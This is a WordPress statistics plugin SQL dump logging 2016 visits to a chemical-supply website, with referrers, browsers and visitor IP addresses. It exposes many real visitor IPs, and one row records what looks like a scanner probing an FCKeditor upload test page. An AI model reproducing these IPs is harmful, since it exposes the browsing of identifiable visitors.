INSERT INTO `wp_statistics_visitor` VALUES (12696, '2016-10-27', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwiJk5qgkPvPAhVh04MKHbcRBWcQFggwMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-826%2F&usg=AFQjCNHj0G0zfOGbw4615b838lZaXvqHvA&sig2=N5uTkkJWUvGaroypqXyaXA&bvm=bv.136811127,d.amc', 'MSIE', 'Windows', '11.0', '', '131.225.46.196', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12697, '2016-10-27', 'https://www.google.ie/', 'Firefox', 'Windows', '49.0', '', '192.168.1.176', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12698, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '10.0.2.66', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12699, '2016-10-27', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '119.236.208.196', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12700, '2016-10-27', 'https://www.nsn-now.com/detail/cageinfo.aspx?parameter=18598', 'Chrome', 'Windows', '53.0.2785.143', '', '71.122.219.178', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12701, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.101.136.97', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12702, '2016-10-27', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '65.158.70.186', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12703, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '69.213.193.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12704, '2016-10-27', 'https://www.google.be/', 'Chrome', 'Windows', '53.0.2785.143', '', '134.58.253.57', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12705, '2016-10-27', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.24.102.233', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12706, '2016-10-27', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '24.63.154.108', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12707, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '208.58.127.242', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12708, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '192.31.106.36', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12709, '2016-10-27', 'https://www.miller-stephenson.com/miller/contact.html', 'MSIE', 'Windows', '9.0', '', '182.118.21.230', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12710, '2016-10-27', 'https://www.miller-stephenson.com/miller/contact.html', 'MSIE', 'Windows', '9.0', '', '182.118.21.227', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12711, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.195', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12712, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '72.242.68.74', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12713, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Macintosh', '54.0.2840.71', '', '104.232.180.2', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12714, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '98.100.36.130', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12715, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '199.107.68.202', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12716, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12717, '2016-10-27', 'https://www.miller-stephenson.com', 'Opera', 'Windows', '8.50', '', '62.210.111.70', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12718, '2016-10-27', 'https://www.google.co.in/', 'Chrome', 'Windows', '54.0.2840.71', '', '114.143.201.42', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12719, '2016-10-27', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '198.0.169.81', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12720, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12721, '2016-10-27', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwidtYKhm_vPAhViVWMKHXS1BcwQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136811127,d.cGc', 'MSIE', 'Windows', '11.0', '', '99.33.180.153', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12722, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '197.45.132.3', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12723, '2016-10-27', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwi3qKCJnPvPAhXK7CYKHV7lD1MQFggvMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136811127,d.eWE', 'MSIE', 'Windows', '11.0', '', '204.239.11.6', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12724, '2016-10-27', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0.1', '', '12.45.190.138', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12725, '2016-10-27', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjuyZCdnfvPAhVGI4EKHfwlAUEYABAA&sig=AOD64_37n5-L6XbNTOPUrab3T0j6y9jWBA&rct=j&q=&ved=0ahUKEwjAtoudnfvPAhUIWj4KHfh7AqAQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '107.10.198.106', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12726, '2016-10-27', 'https://www.google.ca/', 'Firefox', 'Windows', '49.0', '', '132.204.82.235', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12727, '2016-10-27', 'https://r.search.yahoo.com/_ylt=A0LEV1sEFBJYlCYAfI9XNyoA;_ylu=X3oDMTEyNWE5NmRxBGNvbG8DYmYxBHBvcwMyBHZ0aWQDQjE5MTBfMQRzZWMDc3I-/RV=2/RE=1477608580/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fproduct%2fepikure-3030%2f/RK=0/RS=Kj0Q3EXNvlcT9RPiiB_sgm1Jxlk-', 'MSIE', 'Windows', '11.0', '', '206.54.206.159', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12728, '2016-10-27', 'https://www.google.ca/', 'Chrome', 'Windows', '54.0.2840.71', '', '206.55.83.46', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12729, '2016-10-27', 'https://www.miller-stephenson.com', 'Safari', 'Windows', '538.1', '', '41.33.248.228', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12730, '2016-10-27', 'https://www.mschem.com/miller/index.php', 'Chrome', 'Windows', '54.0.2840.71', '', '50.151.36.144', '000', 51, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12731, '2016-10-27', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '184.183.123.15', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12732, '2016-10-27', 'https://r.search.yahoo.com/_ylt=A0LEVvemFhJYLjUAMKsnnIlQ;_ylu=X3oDMTEyNDBsNTg4BGNvbG8DYmYxBHBvcwMyBHZ0aWQDQjIzMzlfMQRzZWMDc3I-/RV=2/RE=1477609255/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=J7KVU95mYCP7XI9ygdKvDW428.E-', 'Firefox', 'Windows', '49.0', '', '96.91.99.13', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12733, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '209.133.79.6', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12734, '2016-10-27', 'https://r.search.yahoo.com/_ylt=AwrBT8_cGBJYmd0A61BXNyoA;_ylu=X3oDMTEyNWJqZ3RqBGNvbG8DYmYxBHBvcwMxBHZ0aWQDQjI4NDRfMQRzZWMDc3I-/RV=2/RE=1477609820/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=OY1asg9ODKkVuQX8jfXYmaKqe1E-', 'Firefox', 'Windows', '47.0', '', '207.87.225.178', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12735, '2016-10-27', 'https://www.google.ca/', 'Chrome', 'Windows', '54.0.2840.59', '', '207.107.64.185', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12736, '2016-10-27', 'https://r.search.yahoo.com/_ylt=A0SO802kGRJYYEAARAdXNyoA;_ylu=X3oDMTEyODBkNWNmBGNvbG8DZ3ExBHBvcwM1BHZ0aWQDQjE4NzlfMQRzZWMDc3I-/RV=2/RE=1477610020/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fproduct%2fepon-826%2f/RK=0/RS=LkprFm.qUh3.q5LalHdqs6bYQcU-', 'MSIE', 'Windows', '11.0', '', '131.225.63.168', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12737, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '72.38.226.162', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12738, '2016-10-27', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '199.46.196.151', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12739, '2016-10-27', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '63.157.105.238', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12740, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.88', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12741, '2016-10-27', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '72.76.243.111', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12742, '2016-10-27', 'https://babitskaya9s91.tumblr.com/', 'Firefox', 'Windows', '43.0', '', '188.186.81.31', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12743, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '63.198.9.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12744, '2016-10-27', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwjJ-6O4pvvPAhUIND4KHTKxBrAQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136811127,d.cWw', 'MSIE', 'Windows', '11.0', '', '72.90.68.66', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12745, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '65.196.116.115', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12746, '2016-10-27', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '28.0', '', '149.202.127.215', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12747, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '199.81.238.115', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12748, '2016-10-27', 'https://www.google.ru/', 'Chrome', 'Windows', '49.0.2623.112', '', '84.253.83.140', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12749, '2016-10-27', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '46.118.119.203', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12750, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.116', '', '46.118.119.203', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12751, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '12.153.108.171', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12752, '2016-10-27', 'https://www.google.com/aclk?sa=L&ai=DChcSEwi-8ZDvqfvPAhWFHYEKHfepD-8YABAL&sig=AOD64_2DX4KVuo6nhMrPYNkd_rQ8FYkyLg&rct=j&q=&ved=0ahUKEwij64vvqfvPAhVB4CYKHWbeAG4Q0QwINg&adurl=', 'MSIE', 'Windows', '11.0', '', '75.149.137.69', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12753, '2016-10-27', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '69.160.196.222', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12754, '2016-10-27', 'https://www.bing.com/search?q=xht-bdx+grease&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.241', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12755, '2016-10-27', 'https://www.miller-stephenson.com/product/krytox-xht-bdx/', 'MSIE', 'Windows', '9.0', '', '204.79.180.145', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12756, '2016-10-27', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjxwauZq_vPAhWQg2kKHYuUBSAYABAA&sig=AOD64_2-UHVctCbDsXCs7N2ayj-aZQdgww&rct=j&q=&ved=0ahUKEwis3qmZq_vPAhUE0YMKHaOlD6AQ0QwI_gE&adurl=', 'MSIE', 'Windows', '11.0', '', '68.175.97.215', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12757, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '86.47.186.105', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12758, '2016-10-27', 'https://www.bing.com/search?q=crazing+resistance+in+coatings&qs=n&form=QBRE&pq=crazing+resistance+in+coatings&sc=0-30&sp=-1&sk=&cvid=85E139C3126A4746979FE89E71848EEE', 'MSIE', 'Windows', '8.0', '', '10.88.102.67', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12759, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '176.31.39.23', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12760, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '66.199.22.250', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12761, '2016-10-27', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '174.192.18.126', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12762, '2016-10-27', 'https://www.google.com.sa/', 'Chrome', 'Android', '53.0.2785.124', '', '5.244.35.98', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12763, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.31.242.196', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12764, '2016-10-27', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjZ1uuHr_vPAhWGXH4KHXmeCAMYABAB&sig=AOD64_1FpCegnQX101Ya0H-uyHRpX8QeCA&rct=j&q=&ved=0ahUKEwiVweeHr_vPAhVC5GMKHWxjAUwQ0QwIIQ&adurl=', 'MSIE', 'Windows', '11.0', '', '199.5.231.11', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12765, '2016-10-27', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiUy7nbtPvPAhVpiVQKHfGKC20QFggeMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fepoxy-resins%2Fepikure-curing-agents%2Fepikure-w-composites%2F&usg=AFQjCNHzMMm4nfWayelq-CkvH8QGcxHOCg', 'MSIE', 'Windows', '11.0', '', '38.111.159.185', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12766, '2016-10-27', 'https://www.google.ca/', 'Chrome', 'Windows', '54.0.2840.71', '', '70.80.202.107', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12767, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '141.123.143.102', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12768, '2016-10-27', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjfxsPktvvPAhVS6GMKHWkIAe0QFggrMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136811127,d.amc', 'MSIE', 'Windows', '11.0', '', '149.32.192.41', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12769, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '71.12.98.58', '000', 23, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12770, '2016-10-27', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '28.0', '', '188.165.28.233', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12771, '2016-10-27', 'https://www.google.com/', 'Safari', 'iPad', '9.0', '', '24.63.15.220', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12772, '2016-10-27', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/', 'Safari', 'iPhone', '7.0', '', '199.30.24.155', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12773, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '70.60.48.170', '000', 21, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12774, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '64.140.215.24', '000', 46, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12775, '2016-10-27', 'https://www.bing.com/search?q=miller+stevenson&form=IE10TR&src=IE10TR&pc=MDDRJS', 'MSIE', 'Windows', '11.0', '', '68.178.28.234', '000', 26, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12776, '2016-10-27', 'https://www.google.ca/', 'Chrome', 'Android', '54.0.2840.68', '', '104.200.7.85', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12777, '2016-10-27', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '13.10586', '', '24.63.154.108', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12778, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '65.132.34.107', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12779, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '174.27.132.200', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12780, '2016-10-27', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '3.5.0', '', '91.200.12.12', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12781, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.70', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12782, '2016-10-27', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '91.200.12.12', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12783, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '49.0.2623.112', '', '24.141.2.63', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12784, '2016-10-27', 'https://r.search.yahoo.com/_ylt=A0LEVjXINxJYWLkAuCEnnIlQ;_ylu=X3oDMTByOHZyb21tBGNvbG8DYmYxBHBvcwMxBHZ0aWQDBHNlYwNzcg--/RV=2/RE=1477617737/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=V8RmW5qknvzNVjzn4ljaObcisYI-', 'Firefox', 'Windows', '48.0', '', '71.122.253.217', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12785, '2016-10-27', 'https://expo.spacecomexpo.com/SPC16/Public/eBooth.aspx?IndexInList=45&FromPage=Exhibitors.aspx&ParentBoothID=&ListByBooth=true&BoothID=322899', 'Chrome', 'Windows', '49.0.2623.112', '', '123.63.8.246', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12786, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.199', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12787, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.5', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12788, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '24.249.25.142', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12789, '2016-10-27', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwiNgbvNwfvPAhXBPj4KHQH9BQAQFggvMAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fplastic-glass-metal-cleaner%2F&usg=AFQjCNHPWy4BoHCEDieQeBhAcZ0emHXcqw', 'MSIE', 'Windows', '11.0', '', '192.249.47.174', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12790, '2016-10-27', 'https://mfg.regionaldirectory.us/chemicals/california.htm', 'Chrome', 'Windows', '53.0.2785.143', '', '67.185.151.166', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12791, '2016-10-27', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '107.77.70.59', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12792, '2016-10-27', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&sqi=2&ved=0ahUKEwiO2d6vxPvPAhUJ9WMKHXHOCAYQjBAIIjAB&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Ftribosys%2Fptfe-dryfilm-lubricants%2F&usg=AFQjCNGbkrsEd1oupMqq-nMxkLQTYxMOmw&bvm=bv.136811127,d.cGc', 'MSIE', 'Windows', '11.0', '', '130.76.24.8', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12793, '2016-10-27', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '66.60.157.77', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12794, '2016-10-27', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiHqp_ZxfvPAhVRHYEKHUD7CDYYABAA&sig=AOD64_30Pg_EPhd-l6v-2VVMkJoNRhZpMA&rct=j&q=&ved=0ahUKEwiLs5vZxfvPAhXCYSYKHZHQANMQ0QwIWA&adurl=', 'MSIE', 'Windows', '11.0', '', '199.29.132.2', '000', 48, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12795, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '96.92.89.170', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12796, '2016-10-27', 'https://www.miller-stephenson.com/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html', 'MSIE', 'Windows', '6.0', '', '178.137.88.65', '000', 40, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12797, '2016-10-27', 'https://www.google.ru/', 'Chrome', 'Windows', '54.0.2840.71', '', '31.23.70.49', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12798, '2016-10-27', 'https://www.google.com.mx/', 'Chrome', 'Windows', '54.0.2840.71', '', '189.223.242.5', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12799, '2016-10-27', 'https://www.google.com/', 'Safari', 'iPad', '9.0', '', '76.101.75.44', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12800, '2016-10-27', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '98.164.116.24', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12801, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '64.223.223.3', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12802, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.11', '', '98.177.179.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12803, '2016-10-27', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '99.92.113.166', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12804, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '161.84.225.12', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12805, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.153', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12806, '2016-10-27', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '173.44.40.178', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12807, '2016-10-27', 'https://www.miller-stephenson.com', 'Python-urllib', 'Unknown', '2.7', '', '51.255.141.131', '000', 29, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12808, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '96.11.114.21', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12809, '2016-10-27', 'https://msxml.excite.com/search/web?qsi=11&q=Lubricant%20ms-122&p=2&fcoid=4&fcop=bottomnav&fpid=2', 'MSIE', 'Windows', '11.0', '', '192.146.217.50', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12810, '2016-10-27', 'https://www.bing.com/search?q=MILLER+STEPHENSON&src=IE-SearchBox&FORM=IENTTR&conversationid=', 'MSIE', 'Windows', '11.0', '', '40.141.65.50', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12811, '2016-10-27', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.56.167.223', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12812, '2016-10-27', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '65.249.12.2', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12813, '2016-10-27', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0ahUKEwjVyan61PvPAhXF3SYKHScdDt0QFghHMAc&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvazo-64-radical-initiator%2Fvazo-64-aibn%2F&usg=AFQjCNHXD0t2BbzNoqzOcTUnqTrUEHXZow&sig2=4v4u_OvQEOgn4KFmE31S9Q&bvm=bv.136811127,d.eWE', 'MSIE', 'Windows', '11.0', '', '207.250.144.45', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12814, '2016-10-27', 'https://www.nsn-now.com/detail/summary.aspx?nsn=McW16hwFVu%2f2ErvBhcG%2bLhpDJ2OhTirBbyVIVyO2NZK0IzDHhuznGKcDAD0sUauJ', 'Chrome', 'Windows', '54.0.2840.71', '', '31.145.42.9', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12815, '2016-10-27', 'https://www.miller-stephenson.com/product/conformal-coating-stripper/', 'Firefox', 'Windows', '33.0', '', '98.109.101.115', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12816, '2016-10-27', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '142.129.57.255', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (12817, '2016-10-27', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.139', '000', 1, 0); 
